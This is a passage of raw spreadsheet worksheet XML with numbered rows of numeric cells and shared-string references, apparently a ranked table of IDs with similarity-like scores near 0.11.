      <c r="B17954" s="2">
        <v>4.6419481E7</v>
      </c>
      <c r="C17954" s="2" t="s">
        <v>17306</v>
      </c>
      <c r="D17954" s="2">
        <v>1.0</v>
      </c>
      <c r="E17954" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17954" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="17955" ht="15.75" customHeight="1">
      <c r="A17955" s="1">
        <v>20230.0</v>
      </c>
      <c r="B17955" s="2">
        <v>1.0790745E7</v>
      </c>
      <c r="C17955" s="2" t="s">
        <v>17307</v>
      </c>
      <c r="D17955" s="2">
        <v>1.0</v>
      </c>
      <c r="E17955" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17955" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="17956" ht="15.75" customHeight="1">
      <c r="A17956" s="1">
        <v>25710.0</v>
      </c>
      <c r="B17956" s="2">
        <v>1.4530134E7</v>
      </c>
      <c r="C17956" s="2" t="s">
        <v>17308</v>
      </c>
      <c r="D17956" s="2">
        <v>1.0</v>
      </c>
      <c r="E17956" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17956" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="17957" ht="15.75" customHeight="1">
      <c r="A17957" s="1">
        <v>26163.0</v>
      </c>
      <c r="B17957" s="2">
        <v>1.6097611E7</v>
      </c>
      <c r="C17957" s="2" t="s">
        <v>17309</v>
      </c>
      <c r="D17957" s="2">
        <v>1.0</v>
      </c>
      <c r="E17957" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17957" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="17958" ht="15.75" customHeight="1">
      <c r="A17958" s="1">
        <v>32401.0</v>
      </c>
      <c r="B17958" s="2">
        <v>5627572.0</v>
      </c>
      <c r="C17958" s="2" t="s">
        <v>17310</v>
      </c>
      <c r="D17958" s="2">
        <v>1.0</v>
      </c>
      <c r="E17958" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17958" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="17959" ht="15.75" customHeight="1">
      <c r="A17959" s="1">
        <v>32426.0</v>
      </c>
      <c r="B17959" s="2">
        <v>5649844.0</v>
      </c>
      <c r="C17959" s="2" t="s">
        <v>17311</v>
      </c>
      <c r="D17959" s="2">
        <v>1.0</v>
      </c>
      <c r="E17959" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17959" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="17960" ht="15.75" customHeight="1">
      <c r="A17960" s="1">
        <v>17213.0</v>
      </c>
      <c r="B17960" s="2">
        <v>4.9040392E7</v>
      </c>
      <c r="C17960" s="2" t="s">
        <v>17312</v>
      </c>
      <c r="D17960" s="2">
        <v>1.0</v>
      </c>
      <c r="E17960" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17960" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="17961" ht="15.75" customHeight="1">
      <c r="A17961" s="1">
        <v>20616.0</v>
      </c>
      <c r="B17961" s="2">
        <v>1.3987383E7</v>
      </c>
      <c r="C17961" s="2" t="s">
        <v>17313</v>
      </c>
      <c r="D17961" s="2">
        <v>1.0</v>
      </c>
      <c r="E17961" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17961" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="17962" ht="15.75" customHeight="1">
      <c r="A17962" s="1">
        <v>23609.0</v>
      </c>
      <c r="B17962" s="2">
        <v>6409484.0</v>
      </c>
      <c r="C17962" s="2" t="s">
        <v>17314</v>
      </c>
      <c r="D17962" s="2">
        <v>1.0</v>
      </c>
      <c r="E17962" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17962" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="17963" ht="15.75" customHeight="1">
      <c r="A17963" s="1">
        <v>27239.0</v>
      </c>
      <c r="B17963" s="2">
        <v>2.1047142E7</v>
      </c>
      <c r="C17963" s="2" t="s">
        <v>17315</v>
      </c>
      <c r="D17963" s="2">
        <v>1.0</v>
      </c>
      <c r="E17963" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17963" s="2">
        <v>0.1140350877192982</v>
      </c>
    </row>
    <row r="17964" ht="15.75" customHeight="1">
      <c r="A17964" s="1">
        <v>2377.0</v>
      </c>
      <c r="B17964" s="2">
        <v>3.3317743E7</v>
      </c>
      <c r="C17964" s="2" t="s">
        <v>17316</v>
      </c>
      <c r="D17964" s="2">
        <v>1.0</v>
      </c>
      <c r="E17964" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17964" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="17965" ht="15.75" customHeight="1">
      <c r="A17965" s="1">
        <v>11300.0</v>
      </c>
      <c r="B17965" s="2">
        <v>2.0971718E7</v>
      </c>
      <c r="C17965" s="2" t="s">
        <v>17317</v>
      </c>
      <c r="D17965" s="2">
        <v>1.0</v>
      </c>
      <c r="E17965" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17965" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="17966" ht="15.75" customHeight="1">
      <c r="A17966" s="1">
        <v>20697.0</v>
      </c>
      <c r="B17966" s="2">
        <v>1.4524656E7</v>
      </c>
      <c r="C17966" s="2" t="s">
        <v>17318</v>
      </c>
      <c r="D17966" s="2">
        <v>1.0</v>
      </c>
      <c r="E17966" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17966" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="17967" ht="15.75" customHeight="1">
      <c r="A17967" s="1">
        <v>21320.0</v>
      </c>
      <c r="B17967" s="2">
        <v>2.0895963E7</v>
      </c>
      <c r="C17967" s="2" t="s">
        <v>17319</v>
      </c>
      <c r="D17967" s="2">
        <v>1.0</v>
      </c>
      <c r="E17967" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17967" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="17968" ht="15.75" customHeight="1">
      <c r="A17968" s="1">
        <v>21943.0</v>
      </c>
      <c r="B17968" s="2">
        <v>2.87247E7</v>
      </c>
      <c r="C17968" s="2" t="s">
        <v>17320</v>
      </c>
      <c r="D17968" s="2">
        <v>1.0</v>
      </c>
      <c r="E17968" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17968" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="17969" ht="15.75" customHeight="1">
      <c r="A17969" s="1">
        <v>26418.0</v>
      </c>
      <c r="B17969" s="2">
        <v>1.7141075E7</v>
      </c>
      <c r="C17969" s="2" t="s">
        <v>17321</v>
      </c>
      <c r="D17969" s="2">
        <v>1.0</v>
      </c>
      <c r="E17969" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17969" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="17970" ht="15.75" customHeight="1">
      <c r="A17970" s="1">
        <v>27190.0</v>
      </c>
      <c r="B17970" s="2">
        <v>2.0895962E7</v>
      </c>
      <c r="C17970" s="2" t="s">
        <v>17319</v>
      </c>
      <c r="D17970" s="2">
        <v>1.0</v>
      </c>
      <c r="E17970" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17970" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="17971" ht="15.75" customHeight="1">
      <c r="A17971" s="1">
        <v>27207.0</v>
      </c>
      <c r="B17971" s="2">
        <v>2.0951989E7</v>
      </c>
      <c r="C17971" s="2" t="s">
        <v>17322</v>
      </c>
      <c r="D17971" s="2">
        <v>1.0</v>
      </c>
      <c r="E17971" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17971" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="17972" ht="15.75" customHeight="1">
      <c r="A17972" s="1">
        <v>29040.0</v>
      </c>
      <c r="B17972" s="2">
        <v>3.0159551E7</v>
      </c>
      <c r="C17972" s="2" t="s">
        <v>17323</v>
      </c>
      <c r="D17972" s="2">
        <v>1.0</v>
      </c>
      <c r="E17972" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17972" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="17973" ht="15.75" customHeight="1">
      <c r="A17973" s="1">
        <v>30055.0</v>
      </c>
      <c r="B17973" s="2">
        <v>3625090.0</v>
      </c>
      <c r="C17973" s="2" t="s">
        <v>17324</v>
      </c>
      <c r="D17973" s="2">
        <v>1.0</v>
      </c>
      <c r="E17973" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17973" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="17974" ht="15.75" customHeight="1">
      <c r="A17974" s="1">
        <v>33393.0</v>
      </c>
      <c r="B17974" s="2">
        <v>7690279.0</v>
      </c>
      <c r="C17974" s="2" t="s">
        <v>17325</v>
      </c>
      <c r="D17974" s="2">
        <v>1.0</v>
      </c>
      <c r="E17974" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17974" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="17975" ht="15.75" customHeight="1">
      <c r="A17975" s="1">
        <v>34101.0</v>
      </c>
      <c r="B17975" s="2">
        <v>9696819.0</v>
      </c>
      <c r="C17975" s="2" t="s">
        <v>17326</v>
      </c>
      <c r="D17975" s="2">
        <v>1.0</v>
      </c>
      <c r="E17975" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17975" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="17976" ht="15.75" customHeight="1">
      <c r="A17976" s="1">
        <v>1784.0</v>
      </c>
      <c r="B17976" s="2">
        <v>2.9087265E7</v>
      </c>
      <c r="C17976" s="2" t="s">
        <v>17327</v>
      </c>
      <c r="D17976" s="2">
        <v>1.0</v>
      </c>
      <c r="E17976" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17976" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="17977" ht="15.75" customHeight="1">
      <c r="A17977" s="1">
        <v>25346.0</v>
      </c>
      <c r="B17977" s="2">
        <v>1.3544863E7</v>
      </c>
      <c r="C17977" s="2" t="s">
        <v>17328</v>
      </c>
      <c r="D17977" s="2">
        <v>1.0</v>
      </c>
      <c r="E17977" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17977" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="17978" ht="15.75" customHeight="1">
      <c r="A17978" s="1">
        <v>32842.0</v>
      </c>
      <c r="B17978" s="2">
        <v>6252743.0</v>
      </c>
      <c r="C17978" s="2" t="s">
        <v>17329</v>
      </c>
      <c r="D17978" s="2">
        <v>1.0</v>
      </c>
      <c r="E17978" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17978" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="17979" ht="15.75" customHeight="1">
      <c r="A17979" s="1">
        <v>28815.0</v>
      </c>
      <c r="B17979" s="2">
        <v>2.8724699E7</v>
      </c>
      <c r="C17979" s="2" t="s">
        <v>17330</v>
      </c>
      <c r="D17979" s="2">
        <v>1.0</v>
      </c>
      <c r="E17979" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17979" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="17980" ht="15.75" customHeight="1">
      <c r="A17980" s="1">
        <v>19540.0</v>
      </c>
      <c r="B17980" s="2">
        <v>5.6030506E7</v>
      </c>
      <c r="C17980" s="2" t="s">
        <v>17331</v>
      </c>
      <c r="D17980" s="2">
        <v>1.0</v>
      </c>
      <c r="E17980" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17980" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="17981" ht="15.75" customHeight="1">
      <c r="A17981" s="1">
        <v>32339.0</v>
      </c>
      <c r="B17981" s="2">
        <v>5.5912244E7</v>
      </c>
      <c r="C17981" s="2" t="s">
        <v>17332</v>
      </c>
      <c r="D17981" s="2">
        <v>1.0</v>
      </c>
      <c r="E17981" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17981" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="17982" ht="15.75" customHeight="1">
      <c r="A17982" s="1">
        <v>2292.0</v>
      </c>
      <c r="B17982" s="2">
        <v>3.2619159E7</v>
      </c>
      <c r="C17982" s="2" t="s">
        <v>17333</v>
      </c>
      <c r="D17982" s="2">
        <v>1.0</v>
      </c>
      <c r="E17982" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17982" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="17983" ht="15.75" customHeight="1">
      <c r="A17983" s="1">
        <v>3107.0</v>
      </c>
      <c r="B17983" s="2">
        <v>3.674728E7</v>
      </c>
      <c r="C17983" s="2" t="s">
        <v>17334</v>
      </c>
      <c r="D17983" s="2">
        <v>1.0</v>
      </c>
      <c r="E17983" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17983" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="17984" ht="15.75" customHeight="1">
      <c r="A17984" s="1">
        <v>18131.0</v>
      </c>
      <c r="B17984" s="2">
        <v>5.1812799E7</v>
      </c>
      <c r="C17984" s="2" t="s">
        <v>17335</v>
      </c>
      <c r="D17984" s="2">
        <v>1.0</v>
      </c>
      <c r="E17984" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17984" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="17985" ht="15.75" customHeight="1">
      <c r="A17985" s="1">
        <v>25615.0</v>
      </c>
      <c r="B17985" s="2">
        <v>1.4402219E7</v>
      </c>
      <c r="C17985" s="2" t="s">
        <v>17336</v>
      </c>
      <c r="D17985" s="2">
        <v>1.0</v>
      </c>
      <c r="E17985" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17985" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="17986" ht="15.75" customHeight="1">
      <c r="A17986" s="1">
        <v>25835.0</v>
      </c>
      <c r="B17986" s="2">
        <v>1.4778698E7</v>
      </c>
      <c r="C17986" s="2" t="s">
        <v>17337</v>
      </c>
      <c r="D17986" s="2">
        <v>1.0</v>
      </c>
      <c r="E17986" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17986" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="17987" ht="15.75" customHeight="1">
      <c r="A17987" s="1">
        <v>27610.0</v>
      </c>
      <c r="B17987" s="2">
        <v>2.2647882E7</v>
      </c>
      <c r="C17987" s="2" t="s">
        <v>17338</v>
      </c>
      <c r="D17987" s="2">
        <v>1.0</v>
      </c>
      <c r="E17987" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17987" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="17988" ht="15.75" customHeight="1">
      <c r="A17988" s="1">
        <v>30997.0</v>
      </c>
      <c r="B17988" s="2">
        <v>4.7602007E7</v>
      </c>
      <c r="C17988" s="2" t="s">
        <v>17339</v>
      </c>
      <c r="D17988" s="2">
        <v>1.0</v>
      </c>
      <c r="E17988" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17988" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="17989" ht="15.75" customHeight="1">
      <c r="A17989" s="1">
        <v>32143.0</v>
      </c>
      <c r="B17989" s="2">
        <v>5.4216631E7</v>
      </c>
      <c r="C17989" s="2" t="s">
        <v>17340</v>
      </c>
      <c r="D17989" s="2">
        <v>1.0</v>
      </c>
      <c r="E17989" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17989" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="17990" ht="15.75" customHeight="1">
      <c r="A17990" s="1">
        <v>27351.0</v>
      </c>
      <c r="B17990" s="2">
        <v>2.1488815E7</v>
      </c>
      <c r="C17990" s="2" t="s">
        <v>17341</v>
      </c>
      <c r="D17990" s="2">
        <v>1.0</v>
      </c>
      <c r="E17990" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17990" s="2">
        <v>0.1136752136752137</v>
      </c>
    </row>
    <row r="17991" ht="15.75" customHeight="1">
      <c r="A17991" s="1">
        <v>12084.0</v>
      </c>
      <c r="B17991" s="2">
        <v>2.6703931E7</v>
      </c>
      <c r="C17991" s="2" t="s">
        <v>17342</v>
      </c>
      <c r="D17991" s="2">
        <v>1.0</v>
      </c>
      <c r="E17991" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17991" s="2">
        <v>0.1121794871794871</v>
      </c>
    </row>
    <row r="17992" ht="15.75" customHeight="1">
      <c r="A17992" s="1">
        <v>12138.0</v>
      </c>
      <c r="B17992" s="2">
        <v>2.7074483E7</v>
      </c>
      <c r="C17992" s="2" t="s">
        <v>17343</v>
      </c>
      <c r="D17992" s="2">
        <v>1.0</v>
      </c>
      <c r="E17992" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17992" s="2">
        <v>0.1121794871794871</v>
      </c>
    </row>
    <row r="17993" ht="15.75" customHeight="1">
      <c r="A17993" s="1">
        <v>27127.0</v>
      </c>
      <c r="B17993" s="2">
        <v>2.0732978E7</v>
      </c>
      <c r="C17993" s="2" t="s">
        <v>17344</v>
      </c>
      <c r="D17993" s="2">
        <v>1.0</v>
      </c>
      <c r="E17993" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17993" s="2">
        <v>0.1121794871794871</v>
      </c>
    </row>
    <row r="17994" ht="15.75" customHeight="1">
      <c r="A17994" s="1">
        <v>28573.0</v>
      </c>
      <c r="B17994" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C17994" s="2" t="s">
        <v>17345</v>
      </c>
      <c r="D17994" s="2">
        <v>1.0</v>
      </c>
      <c r="E17994" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17994" s="2">
        <v>0.1121794871794871</v>
      </c>
    </row>
    <row r="17995" ht="15.75" customHeight="1">
      <c r="A17995" s="1">
        <v>28583.0</v>
      </c>
      <c r="B17995" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C17995" s="2" t="s">
        <v>17346</v>
      </c>
      <c r="D17995" s="2">
        <v>1.0</v>
      </c>
      <c r="E17995" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17995" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="17996" ht="15.75" customHeight="1">
      <c r="A17996" s="1">
        <v>29183.0</v>
      </c>
      <c r="B17996" s="2">
        <v>3.0715599E7</v>
      </c>
      <c r="C17996" s="2" t="s">
        <v>17347</v>
      </c>
      <c r="D17996" s="2">
        <v>1.0</v>
      </c>
      <c r="E17996" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17996" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="17997" ht="15.75" customHeight="1">
      <c r="A17997" s="1">
        <v>1215.0</v>
      </c>
      <c r="B17997" s="2">
        <v>2.4878529E7</v>
      </c>
      <c r="C17997" s="2" t="s">
        <v>17348</v>
      </c>
      <c r="D17997" s="2">
        <v>1.0</v>
      </c>
      <c r="E17997" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17997" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="17998" ht="15.75" customHeight="1">
      <c r="A17998" s="1">
        <v>10772.0</v>
      </c>
      <c r="B17998" s="2">
        <v>1.5610481E7</v>
      </c>
      <c r="C17998" s="2" t="s">
        <v>17349</v>
      </c>
      <c r="D17998" s="2">
        <v>1.0</v>
      </c>
      <c r="E17998" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17998" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="17999" ht="15.75" customHeight="1">
      <c r="A17999" s="1">
        <v>13389.0</v>
      </c>
      <c r="B17999" s="2">
        <v>3.4941925E7</v>
      </c>
      <c r="C17999" s="2" t="s">
        <v>17350</v>
      </c>
      <c r="D17999" s="2">
        <v>1.0</v>
      </c>
      <c r="E17999" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17999" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="18000" ht="15.75" customHeight="1">
      <c r="A18000" s="1">
        <v>22167.0</v>
      </c>
      <c r="B18000" s="2">
        <v>3.1612982E7</v>
      </c>
      <c r="C18000" s="2" t="s">
        <v>17351</v>
      </c>
      <c r="D18000" s="2">
        <v>1.0</v>
      </c>
      <c r="E18000" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18000" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="18001" ht="15.75" customHeight="1">
      <c r="A18001" s="1">
        <v>23724.0</v>
      </c>
      <c r="B18001" s="2">
        <v>7234105.0</v>
      </c>
      <c r="C18001" s="2" t="s">
        <v>17352</v>
      </c>
      <c r="D18001" s="2">
        <v>1.0</v>
      </c>
      <c r="E18001" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18001" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="18002" ht="15.75" customHeight="1">
      <c r="A18002" s="1">
        <v>26190.0</v>
      </c>
      <c r="B18002" s="2">
        <v>1.6210204E7</v>
      </c>
      <c r="C18002" s="2" t="s">
        <v>17353</v>
      </c>
      <c r="D18002" s="2">
        <v>1.0</v>
      </c>
      <c r="E18002" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18002" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="18003" ht="15.75" customHeight="1">
      <c r="A18003" s="1">
        <v>26936.0</v>
      </c>
      <c r="B18003" s="2">
        <v>1.9525633E7</v>
      </c>
      <c r="C18003" s="2" t="s">
        <v>17354</v>
      </c>
      <c r="D18003" s="2">
        <v>1.0</v>
      </c>
      <c r="E18003" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18003" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="18004" ht="15.75" customHeight="1">
      <c r="A18004" s="1">
        <v>28974.0</v>
      </c>
      <c r="B18004" s="2">
        <v>2.9812644E7</v>
      </c>
      <c r="C18004" s="2" t="s">
        <v>17355</v>
      </c>
      <c r="D18004" s="2">
        <v>1.0</v>
      </c>
      <c r="E18004" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18004" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="18005" ht="15.75" customHeight="1">
      <c r="A18005" s="1">
        <v>29184.0</v>
      </c>
      <c r="B18005" s="2">
        <v>3.0715599E7</v>
      </c>
      <c r="C18005" s="2" t="s">
        <v>17356</v>
      </c>
      <c r="D18005" s="2">
        <v>1.0</v>
      </c>
      <c r="E18005" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18005" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="18006" ht="15.75" customHeight="1">
      <c r="A18006" s="1">
        <v>30022.0</v>
      </c>
      <c r="B18006" s="2">
        <v>3.6178198E7</v>
      </c>
      <c r="C18006" s="2" t="s">
        <v>17357</v>
      </c>
      <c r="D18006" s="2">
        <v>1.0</v>
      </c>
      <c r="E18006" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18006" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="18007" ht="15.75" customHeight="1">
      <c r="A18007" s="1">
        <v>31198.0</v>
      </c>
      <c r="B18007" s="2">
        <v>4921456.0</v>
      </c>
      <c r="C18007" s="2" t="s">
        <v>17358</v>
      </c>
      <c r="D18007" s="2">
        <v>1.0</v>
      </c>
      <c r="E18007" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18007" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="18008" ht="15.75" customHeight="1">
      <c r="A18008" s="1">
        <v>31293.0</v>
      </c>
      <c r="B18008" s="2">
        <v>4.9628683E7</v>
      </c>
      <c r="C18008" s="2" t="s">
        <v>17359</v>
      </c>
      <c r="D18008" s="2">
        <v>1.0</v>
      </c>
      <c r="E18008" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18008" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="18009" ht="15.75" customHeight="1">
      <c r="A18009" s="1">
        <v>770.0</v>
      </c>
      <c r="B18009" s="2">
        <v>2.1066552E7</v>
      </c>
      <c r="C18009" s="2" t="s">
        <v>17360</v>
      </c>
      <c r="D18009" s="2">
        <v>1.0</v>
      </c>
      <c r="E18009" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18009" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18010" ht="15.75" customHeight="1">
      <c r="A18010" s="1">
        <v>1835.0</v>
      </c>
      <c r="B18010" s="2">
        <v>2.9358762E7</v>
      </c>
      <c r="C18010" s="2" t="s">
        <v>17361</v>
      </c>
      <c r="D18010" s="2">
        <v>1.0</v>
      </c>
      <c r="E18010" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18010" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18011" ht="15.75" customHeight="1">
      <c r="A18011" s="1">
        <v>1899.0</v>
      </c>
      <c r="B18011" s="2">
        <v>2.9888109E7</v>
      </c>
      <c r="C18011" s="2" t="s">
        <v>17362</v>
      </c>
      <c r="D18011" s="2">
        <v>1.0</v>
      </c>
      <c r="E18011" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18011" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18012" ht="15.75" customHeight="1">
      <c r="A18012" s="1">
        <v>2139.0</v>
      </c>
      <c r="B18012" s="2">
        <v>3.1606441E7</v>
      </c>
      <c r="C18012" s="2" t="s">
        <v>17363</v>
      </c>
      <c r="D18012" s="2">
        <v>1.0</v>
      </c>
      <c r="E18012" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18012" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18013" ht="15.75" customHeight="1">
      <c r="A18013" s="1">
        <v>2202.0</v>
      </c>
      <c r="B18013" s="2">
        <v>3.2049379E7</v>
      </c>
      <c r="C18013" s="2" t="s">
        <v>17364</v>
      </c>
      <c r="D18013" s="2">
        <v>1.0</v>
      </c>
      <c r="E18013" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18013" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18014" ht="15.75" customHeight="1">
      <c r="A18014" s="1">
        <v>2207.0</v>
      </c>
      <c r="B18014" s="2">
        <v>3.2073931E7</v>
      </c>
      <c r="C18014" s="2" t="s">
        <v>17365</v>
      </c>
      <c r="D18014" s="2">
        <v>1.0</v>
      </c>
      <c r="E18014" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18014" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18015" ht="15.75" customHeight="1">
      <c r="A18015" s="1">
        <v>3013.0</v>
      </c>
      <c r="B18015" s="2">
        <v>3.6381932E7</v>
      </c>
      <c r="C18015" s="2" t="s">
        <v>17366</v>
      </c>
      <c r="D18015" s="2">
        <v>1.0</v>
      </c>
      <c r="E18015" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18015" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18016" ht="15.75" customHeight="1">
      <c r="A18016" s="1">
        <v>3381.0</v>
      </c>
      <c r="B18016" s="2">
        <v>3.7942333E7</v>
      </c>
      <c r="C18016" s="2" t="s">
        <v>17367</v>
      </c>
      <c r="D18016" s="2">
        <v>1.0</v>
      </c>
      <c r="E18016" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18016" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18017" ht="15.75" customHeight="1">
      <c r="A18017" s="1">
        <v>3597.0</v>
      </c>
      <c r="B18017" s="2">
        <v>3.9070975E7</v>
      </c>
      <c r="C18017" s="2" t="s">
        <v>17368</v>
      </c>
      <c r="D18017" s="2">
        <v>1.0</v>
      </c>
      <c r="E18017" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18017" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18018" ht="15.75" customHeight="1">
      <c r="A18018" s="1">
        <v>3727.0</v>
      </c>
      <c r="B18018" s="2">
        <v>3.9613612E7</v>
      </c>
      <c r="C18018" s="2" t="s">
        <v>17369</v>
      </c>
      <c r="D18018" s="2">
        <v>1.0</v>
      </c>
      <c r="E18018" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18018" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18019" ht="15.75" customHeight="1">
      <c r="A18019" s="1">
        <v>3872.0</v>
      </c>
      <c r="B18019" s="2">
        <v>4.0346083E7</v>
      </c>
      <c r="C18019" s="2" t="s">
        <v>17370</v>
      </c>
      <c r="D18019" s="2">
        <v>1.0</v>
      </c>
      <c r="E18019" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18019" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18020" ht="15.75" customHeight="1">
      <c r="A18020" s="1">
        <v>4448.0</v>
      </c>
      <c r="B18020" s="2">
        <v>4.2402349E7</v>
      </c>
      <c r="C18020" s="2" t="s">
        <v>17371</v>
      </c>
      <c r="D18020" s="2">
        <v>1.0</v>
      </c>
      <c r="E18020" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18020" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="18021" ht="15.75" customHeight="1">
      <c r="A18021" s="1">
        <v>4507.0</v>
      </c>
